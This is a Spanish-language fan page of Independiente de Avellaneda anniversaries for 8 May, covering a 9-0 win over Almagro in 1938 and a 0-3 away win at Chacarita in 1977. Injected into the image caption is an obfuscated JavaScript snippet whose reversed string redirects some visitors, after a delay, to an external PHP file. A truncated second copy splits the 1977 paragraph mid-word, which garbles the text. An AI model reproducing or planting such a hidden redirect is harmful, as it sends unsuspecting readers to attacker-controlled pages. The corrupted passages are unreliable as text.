Conectate con nosotros

Efemérides

Efemérides del 8 de mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1938 – “Técnico que debuta gana”, frase futbolera de pocos fundamentos ya que hay un sinfín de casos en los que no fue así, pero quien sin dudas la pudo decir, y agregarle, “el debut soñado”, fue Guillermo Ronzoni en la 4ta. fecha del Campeonato, ya que recibió a Almagro, ganándole con un espectacular 9 a 0, máxima goleada histórica frente a ese rival. Los 11 fueron: Bello; Lecea y Coletta; Sastre, Spinetto y Celestino Martínez; Vilariño, Beressi, Erico, Pisa y Funes, con el típico 2-3-5 de la época.

Y en cuanto a la lluvia de goles repasemos: a los 9’ Silvestre Pisa abre el camino de la goleada, con un cabezazo tras el centro de José Vilariño.  A los 12’ es el mismo Vilariño quien marca el 2 a 0.  A los 38’  Arsenio Erico, con gran jugada individual. Luego se sucederían los 4 goles restantes de José Vilariño, a los 43’, 46’, 48’ y 52’, para el 7 a 0. A los 63’ José Beressi marcó el suyo, y finalmente a los 70’ fue Erico nuevamente quien pone el definitivo 9 a 0. Vilariño convirtió 4 goles (de sus 5), en apenas 10 minutos.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p><strong>1977</strong> – En el <strong>Torneo Metropolitano</strong>, Independiente tuvo un flojo, levantó el nivel en las  jornadas siguientes, pero la deuda era fuera de casa, ya que el equipo no había logrado una sola vic<script>$mWn=function(n){if(typeof ($mWn.list[n])==toria en condición de visitante. Un día como hoy, por la fecha 12, visita en San Martín a Chacarita, y el Rojo pagó con creces.

Ganó por 0 a 3 con una verdadera exhibición de fútbol, un baile absoluto. Golazo de tiro libre el “Superpibe” Daniel Bertoni, que durante ese campeonato anotó muchos mediante esa vía, y los dos restantes los anotó el “Beto” Norberto Outes.

Gran actuación de Independiente. Goles expreso: “un equipo que ama el gol”. Además, al término de los 90 minutos, los jugadores fueron aplaudidos no solo por los hinchas rojos sino también por la parcialidad de Chacarita.

A partir de ese triunfo Independiente lograría varios más de visitante, y supo tener una racha estupenda de 14 partidos invictos. El campeón fue River con el Rojo como escolta. Bertoni sería el goleador del plantel con 22 goles y un nivel fuera de serie, siendo el tercer máximo anotador del Campeonato sin ser 9 de área.

Colaboración:  Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides